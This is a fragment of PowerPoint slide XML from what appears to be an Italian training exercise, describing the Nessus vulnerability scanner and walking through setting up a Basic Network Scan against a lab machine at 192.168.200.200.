            <a:off x="10231237" y="5771221"/>
            <a:ext cx="923597" cy="614192"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 22" id="22"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1028700" y="1672594"/>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NESSUS</a:t>
            </a:r>
          </a:p>
        </p:txBody>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5" id="25"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1161868" y="3034038"/>
            <a:ext cx="7750607" cy="5980802"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3199"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2285">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Nessus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2285">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> è uno strumento di scansione delle vulnerabilità utilizzato per identificare punti deboli e configurazioni errate nei sistemi informatici. Questo software esegue scansioni di sicurezza su reti, server, e dispositivi, rilevando vulnerabilità note grazie al confronto che esegue con database sempre aggiornati.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3199"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2285">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Per ogni vulnerabilità trovata fornisce documentazione di studio e possibili remediation action per sanarla o mitigarla. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3199"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2285">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Offre anche un comodo report con tutte le vulnerabilità ordinate per  critictà con il </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2285">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>CVSS (Common Vulnerabilities Scoring System).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3199"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2285">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Per lo scopo di questo esercizio effettueremo una Basic Scan, che analizzerà le porte più comuni ed utilizzate della macchina target.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr name="Picture 26" id="26"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="true"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:srcRect l="0" t="0" r="0" b="0"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="10736134">
            <a:off x="17167208" y="5779747"/>
            <a:ext cx="923597" cy="614192"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover dir="d"/>
  </p:transition>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43780" y="1203187"/>
            <a:ext cx="7085450" cy="9818518"/>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2079603" y="2724866"/>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1432922" y="7569706"/>
            <a:ext cx="4722715" cy="1881407"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="1881407" w="4722715">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4722714" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4722714" y="1881406"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1881406"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 21" id="21"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="377246" y="1820616"/>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Setup di Nessus</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 22" id="22"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="978538" y="2934756"/>
            <a:ext cx="7365616" cy="6779014"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" marL="590417" indent="-295209" lvl="1">
              <a:lnSpc>
                <a:spcPts val="3828"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod" startAt="1"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2734">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Prima di tutto avviamo il servizio di Nessus con il comando :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3828"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3828"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3828"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2734">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3828"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2734">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> 2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2734">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>A questo punto apriamo il browser e andiamo all’indirizzo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2734">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>https://kali:8834,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2734">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> la porta dove inseriremo le nostre credenziali per entrare in Nessus. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3828"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3828"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2734">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2734">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Dopo di ciò, cliccheremo sul tasto </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2734">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>new scan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2734">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> per iniziare a configurare la nuova scansione. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3828"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 23" id="23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="11321941" y="2084225"/>
            <a:ext cx="6593115" cy="4618706"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="4618706" w="6593115">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6593116" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6593116" y="4618706"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4618706"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId6"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 24" id="24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="1210633" y="3920730"/>
            <a:ext cx="8179974" cy="1289108"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="1289108" w="8179974">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8179974" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8179974" y="1289108"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1289108"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId7"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 25" id="25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="-636538">
            <a:off x="8975038" y="5001631"/>
            <a:ext cx="2441452" cy="1489286"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="1489286" w="2441452">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2441452" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2441452" y="1489286"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1489286"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId8"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 26" id="2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Freeform 28" id="28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="333186">
            <a:off x="8925141" y="7654381"/>
            <a:ext cx="2441452" cy="1489286"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="1489286" w="2441452">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2441452" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2441452" y="1489286"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1489286"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId8"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover dir="l"/>
  </p:transition>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5369759" y="3790825"/>
            <a:ext cx="7548481" cy="7001216"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="7001216" w="7548481">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7548482" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7548482" y="7001216"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="7001216"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 3" id="3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="321721" y="-2582003"/>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789549" y="1072098"/>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17" id="17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="13882315" y="-827343"/>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sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 18" id="18"/>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9557324" y="667724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21" id="21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="9030077" y="2842845"/>
            <a:ext cx="8766776" cy="5235935"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="5235935" w="8766776">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8766776" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8766776" y="5235935"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5235935"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect l="-25789" t="0" r="-6916" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 22" id="22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="6299169" y="5011387"/>
            <a:ext cx="2844831" cy="1735347"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="1735347" w="2844831">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2844831" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2844831" y="1735347"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1735347"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId6"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>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5" id="25"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="2051028"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TextBox 26" id="26"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="321721" y="3059750"/>
            <a:ext cx="6594906" cy="5180893"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3188"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2277">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Andremo poi a cliccare su </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2277">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Basic Network Sca</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2277">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>n </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2277">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>e configureremo così il servizio. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3188"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3188"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2277">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Inseriamo un nome e la descrizione, decidiamo poi ina cartella di destinazione e infine specifichiamo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2277">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>l’indirizzo IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2277">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> del nostro target, in questo caso </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2277">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>192.168.200.200</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3188"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3188"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2277">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Vediamo come la scansione effettuerà un check su tutte le porte più comunemente utilizzate.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3188"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3188"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2277">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Dopodiché, facciamo partire la scansione. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3188"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover dir="l"/>
  </p:transition>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326525" y="624564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907712" y="3344813"/>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2234450" y="-3476720"/>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1453932" y="1197302"/>
            <a:ext cx="7017191" cy="9723929"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="4734560" cy="6560820"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 6" id="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7" id="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8" id="8"/>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9" id="9"/>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0" id="10"/>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1" id="11"/>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2" id="12"/>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3" id="13"/>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4" id="14"/>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7" id="17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="13079715" y="5270138"/>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3"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 18" id="18"/>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9" id="19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="15203865" y="-108420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6078471" y="7754955"/>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22" id="22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="7949352" y="1363158"/>
            <a:ext cx="9053248" cy="2740430"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2740430" w="9053248">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9053249" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9053249" y="2740430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2740430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="-32140" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 23" id="23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="10073382" y="4528664"/>
            <a:ext cx="6780573" cy="5039199"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="5039199" w="6780573">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6780574" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6780574" y="5039198"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5039198"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId6"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 24" id="24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="true" rot="1139535">
            <a:off x="8198078" y="3164838"/>
            <a:ext cx="2086109" cy="1877498"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="1877498" w="2086109">
                <a:moveTo>
                  <a:pt x="0" y="1877499"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2086109" y="1877499"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2086109" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="18774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8006768" y="2448965"/>
            <a:ext cx="1467102" cy="517765"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="517765" w="1467102">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1467102" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1467102" y="517764"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5177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0217428" y="5330686"/>
            <a:ext cx="3522945" cy="140918"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="140918" w="3522945">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3522945" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3522945" y="140918"/>
                </a:lnTo>
                <a:lnTo>
